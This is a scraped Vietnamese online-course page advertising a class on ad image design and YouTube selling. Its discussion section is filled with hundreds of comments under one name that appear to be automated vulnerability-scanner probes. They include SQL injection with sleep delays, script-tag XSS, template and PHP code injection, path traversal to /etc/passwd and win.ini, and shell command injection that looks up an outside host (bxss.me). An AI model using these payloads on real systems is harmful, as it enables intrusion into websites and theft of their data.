Tìm kiếm

Nội dung học
Phần 1: Thiết kế hình ảnh quảng cáo, chọn lựa màu sắc theo phong thủy
Icon Autoplay
IconBáo lỗi

Hồ sơ giảng viên

Vũ Ngọc Quyền

Vũ Ngọc Quyền

Founder Học Viện PAcademy

Đánh giá khóa học

Tổng quan

Bạn kinh doanh online, mong muốn khám phá các công cụ, phần mềm để tối ưu hình ảnh đồ họa quảng cáo, truyền thông, bán hàng online

Bạn muốn thiết kế hình ảnh quảng cáo và video quảng cáo bán hàng thu hút, ấn tượng, gia tăng tương tác khách hàng.

Bạn chưa biết thiết kế hình ảnh quảng cáo như thế nào?

Bạn chưa biết làm video quảng cáo sao cho thu hút trên Facebook, Website?

Bạn không biết về photoshop và các phần mềm xử lý hình ảnh?

Bạn mong muốn tối giản chi phí thiết kế hình ảnh quảng cáo, bán hàng, PR cho shop online hay doanh nghiệp của mình?

Bạn mong muốn tối ưu hóa kênh Youtube channel và SEO video Youtube hiệu quả

Hãy đến với khóa học: Nghệ thuật thiết kế hình ảnh quảng cáo online và bán hàng trên youtube, giảng viên hướng dẫn: Vũ Ngọc Quyền

 

Tài liệu

Icon
Khóa học này không có tài liệu đính kèm

Hỏi đáp

Nhập nội dung thảo luận
Danh sách thảo luận mới nhất
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
1????%2527%2522
replyTrả lời
nguyễn văn dũng -
26.10.2022
@@qsAyX
replyTrả lời
nguyễn văn dũng -
26.10.2022
1'"
replyTrả lời
nguyễn văn dũng -
26.10.2022
content'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
replyTrả lời
nguyễn văn dũng -
26.10.2022
replyTrả lời
nguyễn văn dũng -
26.10.2022
71h66csw')) OR 265=(SELECT 265 FROM PG_SLEEP(15))--
replyTrả lời
nguyễn văn dũng -
26.10.2022
10ktOPTc') OR 516=(SELECT 516 FROM PG_SLEEP(15))--
replyTrả lời
nguyễn văn dũng -
26.10.2022
mv4lNM1a' OR 839=(SELECT 839 FROM PG_SLEEP(15))--
replyTrả lời
nguyễn văn dũng -
26.10.2022
Y8Qkc9CT'; waitfor delay '0:0:15' --
replyTrả lời
nguyễn văn dũng -
26.10.2022
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
replyTrả lời
nguyễn văn dũng -
26.10.2022
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
replyTrả lời
nguyễn văn dũng -
26.10.2022
acx__${98991*97996}__::.x
replyTrả lời
nguyễn văn dũng -
26.10.2022
replyTrả lời
nguyễn văn dũng -
26.10.2022
acx__${98991*97996}__::.x
replyTrả lời
nguyễn văn dũng -
26.10.2022
acx[[${98991*97996}]]xca
replyTrả lời
nguyễn văn dũng -
26.10.2022
acx{{98991*97996}}xca
replyTrả lời
nguyễn văn dũng -
26.10.2022
acx[[${98991*97996}]]xca
replyTrả lời
nguyễn văn dũng -
26.10.2022
acx{{98991*97996}}xca
replyTrả lời
nguyễn văn dũng -
26.10.2022
1 waitfor delay '0:0:15' --
replyTrả lời
nguyễn văn dũng -
26.10.2022
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
replyTrả lời
nguyễn văn dũng -
26.10.2022
<th:t="${acx}#foreach
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
<%={{={@{#{${acx}}%>
replyTrả lời
nguyễn văn dũng -
26.10.2022
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
replyTrả lời
nguyễn văn dũng -
26.10.2022
acux9132??z1??z2a?bcxuca9132
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
<th:t="${acx}#foreach
replyTrả lời
nguyễn văn dũng -
26.10.2022
acu7896<s1﹥s2ʺs3ʹuca7896
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
<%={{={@{#{${acx}}%>
replyTrả lời
nguyễn văn dũng -
26.10.2022
e9415819
replyTrả lời
nguyễn văn dũng -
26.10.2022
e'"()&%<acx><ScRiPt >Gxp9(9163)</ScRiPt>
replyTrả lời
nguyễn văn dũng -
26.10.2022
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
replyTrả lời
nguyễn văn dũng -
26.10.2022
acux8215??z1??z2a?bcxuca8215
replyTrả lời
nguyễn văn dũng -
26.10.2022
acu5276<s1﹥s2ʺs3ʹuca5276
replyTrả lời
nguyễn văn dũng -
26.10.2022
content9348154
replyTrả lời
nguyễn văn dũng -
26.10.2022
content'"()&%<acx><ScRiPt >q4k2(9198)</ScRiPt>
replyTrả lời
nguyễn văn dũng -
26.10.2022
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
replyTrả lời
nguyễn văn dũng -
26.10.2022
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
replyTrả lời
nguyễn văn dũng -
26.10.2022
replyTrả lời
nguyễn văn dũng -
26.10.2022
if(now()=sysdate(),sleep(15),0)
replyTrả lời
nguyễn văn dũng -
26.10.2022
replyTrả lời
nguyễn văn dũng -
26.10.2022
-1" OR 3+770-770-1=0+0+0+1 --
replyTrả lời
nguyễn văn dũng -
26.10.2022
-1' OR 2+995-995-1=0+0+0+1 or 'CyNtDAKy'='
replyTrả lời
nguyễn văn dũng -
26.10.2022
-1' OR 3+995-995-1=0+0+0+1 or 'CyNtDAKy'='
replyTrả lời
nguyễn văn dũng -
26.10.2022
-1" OR 2+770-770-1=0+0+0+1 --
replyTrả lời
nguyễn văn dũng -
26.10.2022
-1' OR 2+520-520-1=0+0+0+1 --
replyTrả lời
nguyễn văn dũng -
26.10.2022
-1' OR 3+520-520-1=0+0+0+1 --
replyTrả lời
nguyễn văn dũng -
26.10.2022
-1 OR 3+942-942-1=0+0+0+1
replyTrả lời
nguyễn văn dũng -
26.10.2022
-1 OR 2+942-942-1=0+0+0+1
replyTrả lời
nguyễn văn dũng -
26.10.2022
replyTrả lời
nguyễn văn dũng -
26.10.2022
-1 OR 2+906-906-1=0+0+0+1 --
replyTrả lời
nguyễn văn dũng -
26.10.2022
-1 OR 3+906-906-1=0+0+0+1 --
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
../content
replyTrả lời
nguyễn văn dũng -
26.10.2022
../../../../../../../../../../../../../../etc/passwd
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
../../../../../../../../../../../../../../windows/win.ini
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
value
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
;(nslookup hitimfxbrexwp90950.bxss.me||perl -e "gethostbyname('hitimfxbrexwp90950.bxss.me')")|(nslookup hitimfxbrexwp90950.bxss.me||perl -e "gethostbyname('hitimfxbrexwp90950.bxss.me')")&(nslookup hitimfxbrexwp90950.bxss.me||perl -e "gethostbyname('hitimfxbrexwp90950.bxss.me')")
Xem thêmThu gọn
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
`(nslookup hitoyawhxaspad45d1.bxss.me||perl -e "gethostbyname('hitoyawhxaspad45d1.bxss.me')")`
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
&(nslookup hitlzggsriiwz10c71.bxss.me||perl -e "gethostbyname('hitlzggsriiwz10c71.bxss.me')")&'\"`0&(nslookup hitlzggsriiwz10c71.bxss.me||perl -e "gethostbyname('hitlzggsriiwz10c71.bxss.me')")&`'
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
|(nslookup hitpewhlgvtrv1aad2.bxss.me||perl -e "gethostbyname('hitpewhlgvtrv1aad2.bxss.me')")
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
$(nslookup hitqjnidbjklq9808e.bxss.me||perl -e "gethostbyname('hitqjnidbjklq9808e.bxss.me')")
replyTrả lời
nguyễn văn dũng -
26.10.2022
1ZSiqVzcO
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
(nslookup hitqtcaqjvwsc48a6b.bxss.me||perl -e "gethostbyname('hitqtcaqjvwsc48a6b.bxss.me')")
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
12345'"\'\");|]*{ <>?''????
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
|echo syliey$()\ syydhe\nz^xyu||a #' |echo syliey$()\ syydhe\nz^xyu||a #|" |echo syliey$()\ syydhe\nz^xyu||a #
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
&echo yzantm$()\ ixopnw\nz^xyu||a #' &echo yzantm$()\ ixopnw\nz^xyu||a #|" &echo yzantm$()\ ixopnw\nz^xyu||a #
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
echo pnbjwr$()\ kuhmzk\nz^xyu||a #' &echo pnbjwr$()\ kuhmzk\nz^xyu||a #|" &echo pnbjwr$()\ kuhmzk\nz^xyu||a #
replyTrả lời
nguyễn văn dũng -
26.10.2022
jBl6axjy
replyTrả lời
nguyễn văn dũng -
26.10.2022
acx__${98991*97996}__::.x
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
acx{{98991*97996}}xca
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
acx[[${98991*97996}]]xca
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
<th:t="${acx}#foreach
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content9618331
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
<%={{={@{#{${acx}}%>
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
<!--
replyTrả lời
nguyễn văn dũng -
26.10.2022
/\xfs.bxss.me
replyTrả lời
nguyễn văn dũng -
26.10.2022
content'"()&%<acx><ScRiPt >54uO(9604)</ScRiPt>
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
http://xfs.bxss.me
replyTrả lời
nguyễn văn dũng -
26.10.2022
'"
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
//xfs.bxss.me
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
954409
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
/xfs.bxss.me
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
add-discussion
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
add-discussion/.
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
replyTrả lời
nguyễn văn dũng -
26.10.2022
add-discussion
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
'+'A'.concat(70-3).concat(22*4).concat(113).concat(80).concat(104).concat(76)+(require'socket' Socket.gethostbyname('hitae'+'ijioeniqbd06f.bxss.me.')[3].to_s)+'
replyTrả lời
nguyễn văn dũng -
26.10.2022
HttP://bxss.me/t/xss.html?%00
replyTrả lời
nguyễn văn dũng -
26.10.2022
bxss.me/t/xss.html?%00
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
^(#$!@#$)(()))******
replyTrả lời
nguyễn văn dũng -
26.10.2022
)
replyTrả lời
nguyễn văn dũng -
26.10.2022
"+"A".concat(70-3).concat(22*4).concat(117).concat(69).concat(115).concat(73)+(require"socket" Socket.gethostbyname("hitaa"+"vnrrefagef2a9.bxss.me.")[3].to_s)+"
replyTrả lời
nguyễn văn dũng -
26.10.2022
!(()&&!|*|*|
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
bxss.me
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
http://bxss.me/t/fit.txt?.jpg
replyTrả lời
nguyễn văn dũng -
26.10.2022
Http://bxss.me/t/fit.txt
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
1some_inexistent_file_with_long_name.jpg
replyTrả lời
nguyễn văn dũng -
26.10.2022
content&n931573=v942035
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
${@print(md5(31337))}\
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
'.print(md5(31337)).'
replyTrả lời
nguyễn văn dũng -
26.10.2022
";print(md5(31337));$a="
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
${@print(md5(31337))}
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
';print(md5(31337));$a='
replyTrả lời
nguyễn văn dũng -
26.10.2022
${9999368+9999571}
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
"+response.write(9103298*9626750)+"
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
'+response.write(9103298*9626750)+'
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
response.write(9103298*9626750)
replyTrả lời
nguyễn văn dũng -
26.10.2022
content<esi:include src="http://bxss.me/rpb.png"/>
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
